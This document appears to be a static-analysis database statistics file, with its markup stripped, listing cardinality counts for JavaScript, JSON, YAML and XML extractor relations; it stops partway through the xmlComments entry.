-2 -173483 - - -2 -3 -197229 - - -3 -4 -240036 - - -4 -135127 -6886 - - - - - - -idx -id - - -12 - - -1 -2 -158929 - - -3 -617635 -500 - - - - - - -idx -kind - - -12 - - -1 -2 -159178 - - -2 -7 -251 - - - - - - -idx -parent - - -12 - - -1 -2 -158929 - - -3 -617635 -500 - - - - - - -idx -tostring - - -12 - - -1 -2 -158929 - - -2 -429145 -500 - - - - - - -tostring -id - - -12 - - -1 -2 -511110 - - -2 -3 -165121 - - -3 -6 -69702 - - -6 -63547 -22974 - - - - - - -tostring -kind - - -12 - - -1 -2 -768907 - - - - - - -tostring -parent - - -12 - - -1 -2 -562365 - - -2 -3 -144455 - - -3 
-10 -58431 - - -10 -63547 -3656 - - - - - - -tostring -idx - - -12 - - -1 -2 -554379 - - -2 -3 -185366 - - -3 -720 -29162 - - - - - - - - -json_literals -1026146 - - -value -397229 - - -raw -397431 - - -expr -1026146 - - - - -value -raw - - -12 - - -1 -2 -397027 - - -2 -3 -202 - - - - - - -value -expr - - -12 - - -1 -2 -216149 - - -2 -3 -128106 - - -3 -5 -28217 - - -5 -63547 -24757 - - - - - - -raw -value - - -12 - - -1 -2 -397431 - - - - - - -raw -expr - - -12 - - -1 -2 -216237 - - -2 -3 -128277 - - -3 -5 -28205 - - -5 -63547 -24712 - - - - - - -expr -value - - -12 - - -1 -2 -1026146 - - - - - - -expr -raw - - -12 - - -1 -2 -1026146 - - - - - - - - -json_properties -1186648 - - -obj -441238 - - -property -2285 - - -value -1186648 - - - - -obj -property - - -12 - - -1 -2 -685 - - -2 -3 -161803 - - -3 -4 -272428 - - -4 -252 -6322 - - - - - - -obj -value - - -12 - - -1 -2 -685 - - -2 -3 -161803 - - -3 -4 -272428 - - -4 -252 -6322 - - - - - - -property -obj - - -12 - - -1 -2 -1378 - - -2 -3 -371 - - -3 -4 -199 - - -4 -17 -174 - - -18 -429290 -163 - - - - - - -property -value - - -12 - - -1 -2 -1378 - - -2 -3 -371 - - -3 -4 -199 - - -4 -17 -174 - - -18 -429290 -163 - - - - - - -value -obj - - -12 - - -1 -2 -1186648 - - - - - - -value -property - - -12 - - -1 -2 -1186648 - - - - - - - - -json_errors -id -1 - - -id -1 - - -message -1 - - - - -id -message - - -12 - - -1 -2 -1 - - - - - - -message -id - - -12 - - -1 -2 -1 - - - - - - - - -json_locations -712 - - -locatable -712 - - -location -712 - - - - -locatable -location - - -12 - - -1 -2 -712 - - - - - - -location -locatable - - -12 - - -1 -2 -712 - - - - - - - - -hasLocation -19213780 - - -locatable -19213780 - - -location -15664049 - - - - -locatable -location - - -12 - - -1 -2 -19213780 - - - - - - -location -locatable - - -12 - - -1 -2 -12144311 - - -2 -3 -3490097 - - -3 -6 -29641 - - - - - - - - -entry_cfg_node -id -121542 - - -id -121542 - - -container -121542 - - - - -id -container - - -12 - - -1 -2 -121542 - - 
- - - - -container -id - - -12 - - -1 -2 -121542 - - - - - - - - -exit_cfg_node -id -121542 - - -id -121542 - - -container -121542 - - - - -id -container - - -12 - - -1 -2 -121542 - - - - - - -container -id - - -12 - - -1 -2 -121542 - - - - - - - - -guard_node -177785 - - -id -177785 - - -kind -2 - - -test -91338 - - - - -id -kind - - -12 - - -1 -2 -177785 - - - - - - -id -test - - -12 - - -1 -2 -177785 - - - - - - -kind -id - - -12 - - -86336 -86337 -1 - - -91449 -91450 -1 - - - - - - -kind -test - - -12 - - -82430 -82431 -1 - - -89999 -90000 -1 - - - - - - -test -id - - -12 - - -1 -2 -10245 - - -2 -3 -76994 - - -3 -21 -4099 - - - - - - -test -kind - - -12 - - -1 -2 -10247 - - -2 -3 -81091 - - - - - - - - -successor -6873752 - - -pred -6717415 - - -succ -6718602 - - - - -pred -succ - - -12 - - -1 -2 -6588118 - - -2 -21 -129297 - - - - - - -succ -pred - - -12 - - -1 -2 -6617438 - - -2 -253 -101164 - - - - - - - - -jsdoc -id -19270 - - -id -19270 - - -description -9383 - - -comment -19270 - - - - -id -description - - -12 - - -1 -2 -19270 - - - - - - -id -comment - - -12 - - -1 -2 -19270 - - - - - - -description -id - - -12 - - -1 -2 -7588 - - -2 -3 -1387 - - -3 -5727 -408 - - - - - - -description -comment - - -12 - - -1 -2 -7588 - - -2 -3 -1387 - - -3 -5727 -408 - - - - - - -comment -id - - -12 - - -1 -2 -19270 - - - - - - -comment -description - - -12 - - -1 -2 -19270 - - - - - - - - -jsdoc_tags -id -29323 - - -id -29323 - - -title -92 - - -parent -14226 - - -idx -66 - - -tostring -92 - - - - -id -title - - -12 - - -1 -2 -29323 - - - - - - -id -parent - - -12 - - -1 -2 -29323 - - - - - - -id -idx - - -12 - - -1 -2 -29323 - - - - - - -id -tostring - - -12 - - -1 -2 -29323 - - - - - - -title -id - - -12 - - -1 -2 -11 - - -2 -3 -5 - - -3 -5 -7 - - -5 -7 -8 - - -8 -12 -7 - - -13 -17 -7 - - -20 -35 -7 - - -40 -55 -7 - - -58 -111 -7 - - -114 -167 -8 - - -170 -331 -7 - - -587 -913 -7 - - -2221 -10284 -4 - - - - - - -title -parent - - -12 - - -1 -2 -11 - - -2 -3 -5 - - -3 
-4 -5 - - -4 -6 -7 - - -6 -10 -8 - - -10 -16 -7 - - -16 -26 -7 - - -26 -36 -7 - - -38 -67 -7 - - -68 -111 -7 - - -137 -213 -7 - - -232 -702 -7 - - -870 -6020 -7 - - - - - - -title -idx - - -12 - - -1 -2 -35 - - -2 -3 -8 - - -3 -4 -7 - - -4 -5 -8 - - -5 -6 -8 - - -6 -7 -5 - - -7 -8 -4 - - -8 -10 -8 - - -10 -31 -7 - - -46 -59 -2 - - - - - - -title -tostring - - -12 - - -1 -2 -92 - - - - - - -parent -id - - -12 - - -1 -2 -6064 - - -2 -3 -4452 - - -3 -4 -2064 - - -4 -5 -913 - - -5 -67 -733 - - - - - - -parent -title - - -12 - - -1 -2 -6972 - - -2 -3 -4911 - - -3 -4 -1793 - - -4 -8 -550 - - - - - - -parent -idx - - -12 - - -1 -2 -6064 - - -2 -3 -4452 - - -3 -4 -2064 - - -4 -5 -913 - - -5 -67 -733 - - - - - - -parent -tostring - - -12 - - -1 -2 -6972 - - -2 -3 -4911 - - -3 -4 -1793 - - -4 -8 -550 - - - - - - -idx -id - - -12 - - -1 -2 -2 - - -2 -3 -29 - - -3 -4 -6 - - -4 -5 -5 - - -5 -6 -6 - - -7 -11 -5 - - -11 -53 -5 - - -89 -1647 -5 - - -3710 -14227 -3 - - - - - - -idx -title - - -12 - - -1 -2 -9 - - -2 -3 -31 - - -3 -4 -9 - - -4 -6 -6 - - -8 -21 -5 - - -29 -61 -5 - - -70 -71 -1 - - - - - - -idx -parent - - -12 - - -1 -2 -2 - - -2 -3 -29 - - -3 -4 -6 - - -4 -5 -5 - - -5 -6 -6 - - -7 -11 -5 - - -11 -53 -5 - - -89 -1647 -5 - - -3710 -14227 -3 - - - - - - -idx -tostring - - -12 - - -1 -2 -9 - - -2 -3 -31 - - -3 -4 -9 - - -4 -6 -6 - - -8 -21 -5 - - -29 -61 -5 - - -70 -71 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -11 - - -2 -3 -5 - - -3 -5 -7 - - -5 -7 -8 - - -8 -12 -7 - - -13 -17 -7 - - -20 -35 -7 - - -40 -55 -7 - - -58 -111 -7 - - -114 -167 -8 - - -170 -331 -7 - - -587 -913 -7 - - -2221 -10284 -4 - - - - - - -tostring -title - - -12 - - -1 -2 -92 - - - - - - -tostring -parent - - -12 - - -1 -2 -11 - - -2 -3 -5 - - -3 -4 -5 - - -4 -6 -7 - - -6 -10 -8 - - -10 -16 -7 - - -16 -26 -7 - - -26 -36 -7 - - -38 -67 -7 - - -68 -111 -7 - - -137 -213 -7 - - -232 -702 -7 - - -870 -6020 -7 - - - - - - -tostring -idx - - -12 - - -1 -2 -35 - - -2 -3 -8 - - -3 -4 -7 - - -4 -5 -8 - - 
-5 -6 -8 - - -6 -7 -5 - - -7 -8 -4 - - -8 -10 -8 - - -10 -31 -7 - - -46 -59 -2 - - - - - - - - -jsdoc_tag_descriptions -13676 - - -tag -13676 - - -text -7866 - - - - -tag -text - - -12 - - -1 -2 -13676 - - - - - - -text -tag - - -12 - - -1 -2 -6089 - - -2 -3 -1025 - - -3 -8 -596 - - -8 -459 -156 - - - - - - - - -jsdoc_tag_names -11506 - - -tag -11506 - - -text -2647 - - - - -tag -text - - -12 - - -1 -2 -11506 - - - - - - -text -tag - - -12 - - -1 -2 -1398 - - -2 -3 -569 - - -3 -4 -201 - - -4 -7 -208 - - -7 -24 -200 - - -24 -498 -71 - - - - - - - - -jsdoc_type_exprs -id -22481 - - -id -22481 - - -kind -15 - - -parent -21039 - - -idx -17 - - -tostring -1447 - - - - -id -kind - - -12 - - -1 -2 -22481 - - - - - - -id -parent - - -12 - - -1 -2 -22481 - - - - - - -id -idx - - -12 - - -1 -2 -22481 - - - - - - -id -tostring - - -12 - - -1 -2 -22481 - - - - - - -kind -id - - -12 - - -8 -9 -1 - - -19 -20 -1 - - -27 -28 -1 - - -35 -36 -1 - - -55 -56 -1 - - -91 -92 -1 - - -287 -288 -1 - - -292 -293 -1 - - -303 -304 -1 - - -310 -311 -1 - - -316 -317 -1 - - -536 -537 -1 - - -668 -669 -1 - - -895 -896 -1 - - -18639 -18640 -1 - - - - - - -kind -parent - - -12 - - -8 -9 -1 - - -19 -20 -1 - - -23 -24 -1 - - -35 -36 -1 - - -55 -56 -1 - - -90 -91 -1 - - -287 -288 -2 - - -301 -302 -1 - - -310 -311 -1 - - -314 -315 -1 - - -524 -525 -1 - - -583 -584 -1 - - -890 -891 -1 - - -17717 -17718 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -3 - - -2 -3 -2 - - -3 -4 -5 - - -4 -5 -2 - - -5 -6 -1 - - -13 -14 -1 - - -16 -17 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -5 - - -5 -6 -1 - - -6 -7 -1 - - -51 -52 -1 - - -57 -58 -1 - - -86 -87 -1 - - -89 -90 -1 - - -104 -105 -1 - - -155 -156 -1 - - -194 -195 -1 - - -696 -697 -1 - - - - - - -parent -id - - -12 - - -1 -2 -19985 - - -2 -16 -1054 - - - - - - -parent -kind - - -12 - - -1 -2 -20644 - - -2 -4 -395 - - - - - - -parent -idx - - -12 - - -1 -2 -19985 - - -2 -16 -1054 - - - - - - -parent -tostring - - -12 - - -1 -2 -19997 - - -2 -7 -1042 - - - - - 
- -idx -id - - -12 - - -2 -3 -1 - - -4 -5 -3 - - -6 -7 -4 - - -8 -9 -1 - - -11 -12 -1 - - -23 -24 -1 - - -32 -33 -1 - - -93 -94 -1 - - -165 -166 -1 - - -340 -341 -1 - - -750 -751 -1 - - -21021 -21022 -1 - - - - - - -idx -kind - - -12 - - -1 -2 -5 - - -2 -3 -7 - - -5 -6 -1 - - -6 -7 -1 - - -10 -11 -1 - - -11 -12 -1 - - -13 -14 -1 - - - - - - -idx -parent - - -12 - - -2 -3 -1 - - -4 -5 -3 - - -6 -7 -4 - - -8 -9 -1 - - -11 -12 -1 - - -23 -24 -1 - - -32 -33 -1 - - -93 -94 -1 - - -165 -166 -1 - - -340 -341 -1 - - -750 -751 -1 - - -21021 -21022 -1 - - - - - - -idx -tostring - - -12 - - -2 -3 -2 - - -3 -4 -3 - - -4 -5 -3 - - -5 -6 -1 - - -6 -7 -1 - - -11 -12 -1 - - -17 -18 -1 - - -21 -22 -1 - - -23 -24 -1 - - -42 -43 -1 - - -103 -104 -1 - - -1378 -1379 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -713 - - -2 -3 -271 - - -3 -4 -105 - - -4 -6 -110 - - -6 -12 -111 - - -12 -77 -109 - - -77 -2754 -28 - - - - - - -tostring -kind - - -12 - - -1 -2 -1446 - - -2 -3 -1 - - - - - - -tostring -parent - - -12 - - -1 -2 -713 - - -2 -3 -271 - - -3 -4 -105 - - -4 -6 -110 - - -6 -12 -112 - - -12 -78 -110 - - -78 -2747 -26 - - - - - - -tostring -idx - - -12 - - -1 -2 -1356 - - -2 -15 -91 - - - - - - - - -jsdoc_record_field_name -241 - - -id -90 - - -idx -15 - - -name -123 - - - - -id -idx - - -12 - - -1 -2 -47 - - -2 -3 -19 - - -3 -4 -8 - - -4 -7 -8 - - -7 -16 -8 - - - - - - -id -name - - -12 - - -1 -2 -47 - - -2 -3 -19 - - -3 -4 -8 - - -4 -7 -8 - - -7 -16 -8 - - - - - - -idx -id - - -12 - - -2 -3 -1 - - -4 -5 -3 - - -6 -7 -4 - - -8 -9 -1 - - -10 -11 -1 - - -12 -13 -1 - - -16 -17 -1 - - -24 -25 -1 - - -43 -44 -1 - - -90 -91 -1 - - - - - - -idx -name - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -3 - - -6 -7 -1 - - -8 -9 -1 - - -10 -11 -1 - - -12 -13 -1 - - -13 -14 -1 - - -18 -19 -1 - - -29 -30 -1 - - -37 -38 -1 - - - - - - -name -id - - -12 - - -1 -2 -65 - - -2 -3 -40 - - -3 -4 -6 - - -4 -7 -10 - - -9 -25 -2 - - - - - - -name -idx - - -12 - - -1 -2 -87 - - -2 -3 -34 - - -3 -4 
-2 - - - - - - - - -jsdoc_prefix_qualifier -823 - - -id -823 - - - - - -jsdoc_has_new_parameter -22 - - -fn -22 - - - - - -jsdoc_errors -id -1658 - - -id -1658 - - -tag -1460 - - -message -203 - - -tostring -89 - - - - -id -tag - - -12 - - -1 -2 -1658 - - - - - - -id -message - - -12 - - -1 -2 -1658 - - - - - - -id -tostring - - -12 - - -1 -2 -1658 - - - - - - -tag -id - - -12 - - -1 -2 -1262 - - -2 -3 -198 - - - - - - -tag -message - - -12 - - -1 -2 -1262 - - -2 -3 -198 - - - - - - -tag -tostring - - -12 - - -1 -2 -1262 - - -2 -3 -198 - - - - - - -message -id - - -12 - - -1 -2 -144 - - -2 -3 -27 - - -3 -7 -16 - - -7 -347 -16 - - - - - - -message -tag - - -12 - - -1 -2 -144 - - -2 -3 -27 - - -3 -7 -16 - - -7 -347 -16 - - - - - - -message -tostring - - -12 - - -1 -2 -203 - - - - - - -tostring -id - - -12 - - -1 -2 -48 - - -2 -3 -10 - - -3 -4 -3 - - -4 -5 -6 - - -5 -8 -7 - - -11 -27 -7 - - -34 -347 -7 - - -477 -478 -1 - - - - - - -tostring -tag - - -12 - - -1 -2 -48 - - -2 -3 -10 - - -3 -4 -3 - - -4 -5 -6 - - -5 -8 -7 - - -11 -27 -7 - - -34 -347 -7 - - -477 -478 -1 - - - - - - -tostring -message - - -12 - - -1 -2 -66 - - -2 -3 -6 - - -3 -4 -3 - - -4 -7 -7 - - -8 -25 -7 - - - - - - - - -yaml -id -885 - - -id -885 - - -kind -4 - - -parent -204 - - -idx -25 - - -tag -8 - - -tostring -318 - - - - -id -kind - - -12 - - -1 -2 -885 - - - - - - -id -parent - - -12 - - -1 -2 -885 - - - - - - -id -idx - - -12 - - -1 -2 -885 - - - - - - -id -tag - - -12 - - -1 -2 -885 - - - - - - -id -tostring - - -12 - - -1 -2 -885 - - - - - - -kind -id - - -12 - - -1 -2 -1 - - -35 -36 -1 - - -149 -150 -1 - - -700 -701 -1 - - - - - - -kind -parent - - -12 - - -1 -2 -1 - - -33 -34 -1 - - -90 -91 -1 - - -183 -184 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -1 - - -7 -8 -1 - - -11 -12 -1 - - -25 -26 -1 - - - - - - -kind -tag - - -12 - - -1 -2 -3 - - -5 -6 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -1 - - -10 -11 -1 - - -67 -68 -1 - - -240 -241 -1 - - - - - - -parent -id - - -12 - - -1 -2 
-33 - - -2 -3 -72 - - -3 -4 -2 - - -4 -5 -35 - - -6 -7 -29 - - -8 -11 -14 - - -12 -21 -17 - - -22 -25 -2 - - - - - - -parent -kind - - -12 - - -1 -2 -131 - - -2 -3 -43 - - -3 -4 -30 - - - - - - -parent -idx - - -12 - - -1 -2 -33 - - -2 -3 -72 - - -3 -4 -2 - - -4 -5 -35 - - -6 -7 -29 - - -8 -11 -14 - - -12 -21 -17 - - -22 -25 -2 - - - - - - -parent -tag - - -12 - - -1 -2 -120 - - -2 -3 -41 - - -3 -4 -36 - - -4 -5 -7 - - - - - - -parent -tostring - - -12 - - -1 -2 -33 - - -2 -3 -72 - - -3 -4 -2 - - -4 -5 -35 - - -5 -6 -5 - - -6 -7 -24 - - -8 -11 -14 - - -12 -14 -16 - - -16 -23 -3 - - - - - - -idx -id - - -12 - - -1 -2 -2 - - -2 -3 -2 - - -4 -5 -7 - - -5 -20 -2 - - -20 -25 -2 - - -25 -33 -2 - - -33 -56 -2 - - -61 -64 -2 - - -95 -100 -2 - - -149 -172 -2 - - - - - - -idx -kind - - -12 - - -1 -2 -14 - - -2 -3 -4 - - -3 -4 -6 - - -4 -5 -1 - - - - - - -idx -parent - - -12 - - -1 -2 -2 - - -2 -3 -2 - - -4 -5 -7 - - -5 -20 -2 - - -20 -25 -2 - - -25 -33 -2 - - -33 -56 -2 - - -61 -64 -2 - - -95 -100 -2 - - -149 -172 -2 - - - - - - -idx -tag - - -12 - - -1 -2 -11 - - -2 -3 -5 - - -3 -4 -3 - - -4 -5 -4 - - -6 -7 -2 - - - - - - -idx -tostring - - -12 - - -1 -2 -2 - - -2 -3 -2 - - -3 -4 -3 - - -4 -5 -4 - - -5 -7 -2 - - -7 -11 -2 - - -12 -15 -2 - - -15 -16 -1 - - -18 -19 -2 - - -28 -31 -2 - - -52 -56 -2 - - -87 -88 -1 - - - - - - -tag -id - - -12 - - -1 -2 -2 - - -4 -5 -1 - - -15 -16 -1 - - -26 -27 -1 - - -35 -36 -1 - - -149 -150 -1 - - -654 -655 -1 - - - - - - -tag -kind - - -12 - - -1 -2 -8 - - - - - - -tag -parent - - -12 - - -1 -2 -2 - - -2 -3 -1 - - -3 -4 -1 - - -25 -26 -1 - - -33 -34 -1 - - -90 -91 -1 - - -183 -184 -1 - - - - - - -tag -idx - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -7 -8 -1 - - -9 -10 -1 - - -11 -12 -1 - - -23 -24 -1 - - - - - - -tag -tostring - - -12 - - -1 -2 -3 - - -2 -3 -1 - - -10 -11 -1 - - -13 -14 -1 - - -67 -68 -1 - - -223 -224 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -209 - - -2 -3 -42 - - -3 -6 -29 - - -6 -15 -25 - - -15 -18 -13 - - - - - - 
-tostring -kind - - -12 - - -1 -2 -318 - - - - - - -tostring -parent - - -12 - - -1 -2 -213 - - -2 -3 -41 - - -3 -6 -27 - - -6 -15 -25 - - -15 -18 -12 - - - - - - -tostring -idx - - -12 - - -1 -2 -272 - - -2 -3 -34 - - -3 -10 -12 - - - - - - -tostring -tag - - -12 - - -1 -2 -318 - - - - - - - - -yaml_anchors -1 - - -node -1 - - -anchor -1 - - - - -node -anchor - - -12 - - -1 -2 -1 - - - - - - -anchor -node - - -12 - - -1 -2 -1 - - - - - - - - -yaml_aliases -1 - - -alias -1 - - -target -1 - - - - -alias -target - - -12 - - -1 -2 -1 - - - - - - -target -alias - - -12 - - -1 -2 -1 - - - - - - - - -yaml_scalars -700 - - -scalar -700 - - -style -3 - - -value -241 - - - - -scalar -style - - -12 - - -1 -2 -700 - - - - - - -scalar -value - - -12 - - -1 -2 -700 - - - - - - -style -scalar - - -12 - - -14 -15 -1 - - -97 -98 -1 - - -589 -590 -1 - - - - - - -style -value - - -12 - - -12 -13 -1 - - -47 -48 -1 - - -183 -184 -1 - - - - - - -value -scalar - - -12 - - -1 -2 -158 - - -2 -3 -32 - - -3 -6 -19 - - -6 -15 -20 - - -15 -18 -12 - - - - - - -value -style - - -12 - - -1 -2 -240 - - -2 -3 -1 - - - - - - - - -yaml_errors -id -1 - - -id -1 - - -message -1 - - - - -id -message - - -12 - - -1 -2 -1 - - - - - - -message -id - - -12 - - -1 -2 -1 - - - - - - - - -yaml_locations -71 - - -locatable -71 - - -location -71 - - - - -locatable -location - - -12 - - -1 -2 -71 - - - - - - -location -locatable - - -12 - - -1 -2 -71 - - - - - - - - -xmlEncoding -39724 - - -id -39724 - - -encoding -1 - - - - -id -encoding - - -12 - - -1 -2 -39724 - - - - - - -encoding -id - - -12 - - -39724 -39725 -1 - - - - - - - - -xmlDTDs -1 - - -id -1 - - -root -1 - - -publicId -1 - - -systemId -1 - - -fileid -1 - - - - -id -root - - -12 - - -1 -2 -1 - - - - - - -id -publicId - - -12 - - -1 -2 -1 - - - - - - -id -systemId - - -12 - - -1 -2 -1 - - - - - - -id -fileid - - -12 - - -1 -2 -1 - - - - - - -root -id - - -12 - - -1 -2 -1 - - - - - - -root -publicId - - -12 - - -1 -2 -1 - - - - - - -root -systemId - - 
-12 - - -1 -2 -1 - - - - - - -root -fileid - - -12 - - -1 -2 -1 - - - - - - -publicId -id - - -12 - - -1 -2 -1 - - - - - - -publicId -root - - -12 - - -1 -2 -1 - - - - - - -publicId -systemId - - -12 - - -1 -2 -1 - - - - - - -publicId -fileid - - -12 - - -1 -2 -1 - - - - - - -systemId -id - - -12 - - -1 -2 -1 - - - - - - -systemId -root - - -12 - - -1 -2 -1 - - - - - - -systemId -publicId - - -12 - - -1 -2 -1 - - - - - - -systemId -fileid - - -12 - - -1 -2 -1 - - - - - - -fileid -id - - -12 - - -1 -2 -1 - - - - - - -fileid -root - - -12 - - -1 -2 -1 - - - - - - -fileid -publicId - - -12 - - -1 -2 -1 - - - - - - -fileid -systemId - - -12 - - -1 -2 -1 - - - - - - - - -xmlElements -1270313 - - -id -1270313 - - -name -4655 - - -parentid -578021 - - -idx -35122 - - -fileid -39721 - - - - -id -name - - -12 - - -1 -2 -1270313 - - - - - - -id -parentid - - -12 - - -1 -2 -1270313 - - - - - - -id -idx - - -12 - - -1 -2 -1270313 - - - - - - -id -fileid - - -12 - - -1 -2 -1270313 - - - - - - -name -id - - -12 - - -1 -2 -420 - - -2 -5 -156 - - -5 -6 -3832 - - -6 -310317 -247 - - - - - - -name -parentid - - -12 - - -1 -2 -456 - - -2 -5 -150 - - -5 -6 -3829 - - -6 -161565 -220 - - - - - - -name -idx - - -12 - - -1 -2 -4358 - - -2 -35123 -297 - - - - - - -name -fileid - - -12 - - -1 -2 -486 - - -2 -5 -133 - - -5 -6 -3831 - - -6 -14503 -205 - - - - - - -parentid -id - - -12 - - -1 -2 -371969 - - -2 -3 -62095 - - -3 -4 -104113 - - -4 -35123 -39844 - - - - - - -parentid -name - - -12 - - -1 -2 -500482 - - -2 -3 -17866 - - -3 -4 -49117 - - -4 -45 -10556 - - - - - - -parentid -idx - - -12 - - -1 -2 -371969 - - -2 -3 -62095 - - -3 -4 -104113 - - -4 -35123 -39844 - - - - - - -parentid -fileid - - -12 - - -1 -2 -578021 - - - - - - -idx -id - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -578022 -2083 - - - - - - -idx -name - - -12 - - -1 -2 -18457 - - -2 -3 -6533 - - -3 -4 -6178 - - -4 -8 -2624 - - -8 -4397 -1330 - - - - - - 
-idx -parentid - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -578022 -2083 - - - - - - -idx -fileid - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -39722 -2083 - - - - - - -fileid -id - - -12 - - -1 -2 -20457 - - -2 -3 -3115 - - -3 -7 -3026 - - -7 -8 -3588 - - -8 -9 -2220 - - -9 -11 -3099 - - -11 -19 -3087 - - -19 -114506 -1129 - - - - - - -fileid -name - - -12 - - -1 -2 -20459 - - -2 -3 -3458 - - -3 -5 -2569 - - -5 -7 -2172 - - -7 -8 -6158 - - -8 -9 -3501 - - -9 -46 -1404 - - - - - - -fileid -parentid - - -12 - - -1 -2 -20457 - - -2 -3 -3870 - - -3 -5 -2152 - - -5 -6 -2876 - - -6 -7 -2720 - - -7 -8 -4132 - - -8 -14 -3096 - - -14 -31079 -418 - - - - - - -fileid -idx - - -12 - - -1 -2 -25894 - - -2 -3 -5301 - - -3 -4 -3787 - - -4 -6 -3268 - - -6 -35123 -1471 - - - - - - - - -xmlAttrs -1202020 - - -id -1202020 - - -elementid -760198 - - -name -3649 - - -value -121803 - - -idx -2000 - - -fileid -39448 - - - - -id -elementid - - -12 - - -1 -2 -1202020 - - - - - - -id -name - - -12 - - -1 -2 -1202020 - - - - - - -id -value - - -12 - - -1 -2 -1202020 - - - - - - -id -idx - - -12 - - -1 -2 -1202020 - - - - - - -id -fileid - - -12 - - -1 -2 -1202020 - - - - - - -elementid -id - - -12 - - -1 -2 -425697 - - -2 -3 -249659 - - -3 -4 -66474 - - -4 -2001 -18368 - - - - - - -elementid -name - - -12 - - -1 -2 -425778 - - -2 -3 -249579 - - -3 -4 -66475 - - -4 -2001 -18366 - - - - - - -elementid -value - - -12 - - -1 -2 -466237 - - -2 -3 -266291 - - -3 -46 -27670 - - - - - - -elementid -idx - - -12 - - -1 -2 -425697 - - -2 -3 -249659 - - -3 -4 -66474 - - -4 -2001 -18368 - - - - - - -elementid -fileid - - -12 - - -1 -2 -760198 - - - - - - -name -id - - -12 - - -1 -2 -3467 - - -2 -262475 -182 - - - - - - -name -elementid - - -12 - - -1 -2 -3467 - - -2 -262475 -182 - - - - - - -name -value - - -12 - - -1 -2 -3501 - - -2 -54146 -148 - - - - - - -name -idx - 
- -12 - - -1 -2 -3531 - - -2 -11 -118 - - - - - - -name -fileid - - -12 - - -1 -2 -3491 - - -2 -21768 -158 - - - - - - -value -id - - -12 - - -1 -2 -72032 - - -2 -3 -42366 - - -3 -199269 -7405 - - - - - - -value -elementid - - -12 - - -1 -2 -72036 - - -2 -3 -42374 - - -3 -199269 -7393 - - - - - - -value -name - - -12 - - -1 -2 -116722 - - -2 -2041 -5081 - - - - - - -value -idx - - -12 - - -1 -2 -117957 - - -2 -2001 -3846 - - - - - - -value -fileid - - -12 - - -1 -2 -86306 - - -2 -3 -28570 - - -3 -4175 -6927 - - - - - - -idx -id - - -12 - - -1 -2 -1955 - - -2 -760199 -45 - - - - - - -idx -elementid - - -12 - - -1 -2 -1955 - - -2 -760199 -45 - - - - - - -idx -name - - -12 - - -1 -2 -1955 - - -2 -189 -45 - - - - - - -idx -value - - -12 - - -1 -2 -1955 - - -2 -116643 -45 - - - - - - -idx -fileid - - -12 - - -1 -2 -1955 - - -2 -39449 -45 - - - - - - -fileid -id - - -12 - - -1 -2 -22884 - - -2 -4 -2565 - - -4 -6 -2294 - - -6 -7 -3299 - - -7 -9 -3272 - - -9 -16 -3143 - - -16 -129952 -1991 - - - - - - -fileid -elementid - - -12 - - -1 -2 -23890 - - -2 -4 -2131 - - -4 -5 -1971 - - -5 -6 -4096 - - -6 -8 -3519 - - -8 -16 -3137 - - -16 -106600 -704 - - - - - - -fileid -name - - -12 - - -1 -2 -22946 - - -2 -3 -2338 - - -3 -4 -2726 - - -4 -5 -2824 - - -5 -6 -2994 - - -6 -7 -3876 - - -7 -2002 -1744 - - - - - - -fileid -value - - -12 - - -1 -2 -22916 - - -2 -4 -2772 - - -4 -5 -2112 - - -5 -6 -3510 - - -6 -8 -1993 - - -8 -11 -3365 - - -11 -50357 -2780 - - - - - - -fileid -idx - - -12 - - -1 -2 -26133 - - -2 -3 -9699 - - -3 -5 -3511 - - -5 -2001 -105 - - - - - - - - -xmlNs -71201 - - -id -4185 - - -prefixName -958 - - -URI -4185 - - -fileid -39544 - - - - -id -prefixName - - -12 - - -1 -2 -2602 - - -2 -3 -1553 - - -3 -872 -30 - - - - - - -id -URI - - -12 - - -1 -2 -4185 - - - - - - -id -fileid - - -12 - - -1 -6 -274 - - -6 -7 -3825 - - -7 -24905 -86 - - - - - - -prefixName -id - - -12 - - -1 -2 -915 - - -2 -4054 -43 - - - - - - -prefixName -URI - - -12 - - -1 -2 -915 - - -2 -4054 
-43 - - - - - - -prefixName -fileid - - -12 - - -1 -2 -828 - - -2 -5 -73 - - -5 -24903 -57 - - - - - - -URI -id - - -12 - - -1 -2 -4185 - - - - - - -URI -prefixName - - -12 - - -1 -2 -2602 - - -2 -3 -1553 - - -3 -872 -30 - - - - - - -URI -fileid - - -12 - - -1 -6 -274 - - -6 -7 -3825 - - -7 -24905 -86 - - - - - - -fileid -id - - -12 - - -1 -2 -11655 - - -2 -3 -26146 - - -3 -8 -1743 - - - - - - -fileid -prefixName - - -12 - - -1 -2 -11653 - - -2 -3 -25982 - - -3 -31 -1909 - - - - - - -fileid -URI - - -12 - - -1 -2 -11655 - - -2 -3 -26146 - - -3 -8 -1743 - - - - - - - - -xmlHasNs -1139730 - - -elementId -1139730 - - -nsId -4136 - - -fileid -39537 - - - - -elementId -nsId - - -12 - - -1 -2 -1139730 - - - - - - -elementId -fileid - - -12 - - -1 -2 -1139730 - - - - - - -nsId -elementId - - -12 - - -1 -5 -234 - - -5 -6 -3824 - - -6 -643289 -78 - - - - - - -nsId -fileid - - -12 - - -1 -5 -257 - - -5 -6 -3823 - - -6 -24759 -56 - - - - - - -fileid -elementId - - -12 - - -1 -2 -3669 - - -2 -3 -20429 - - -3 -7 -2536 - - -7 -8 -3473 - - -8 -9 -2258 - - -9 -11 -3036 - - -11 -18 -2966 - - -18 -147552 -1170 - - - - - - -fileid -nsId - - -12 - - -1 -2 -18261 - - -2 -3 -21032 - - -3 -8 -244 - - - - - - - - -xmlComments -26812 - - -id -26812 - - -text -22933 - - -parentid -26546 - - -fileid -26368 - - - - -id -text - - -12 - 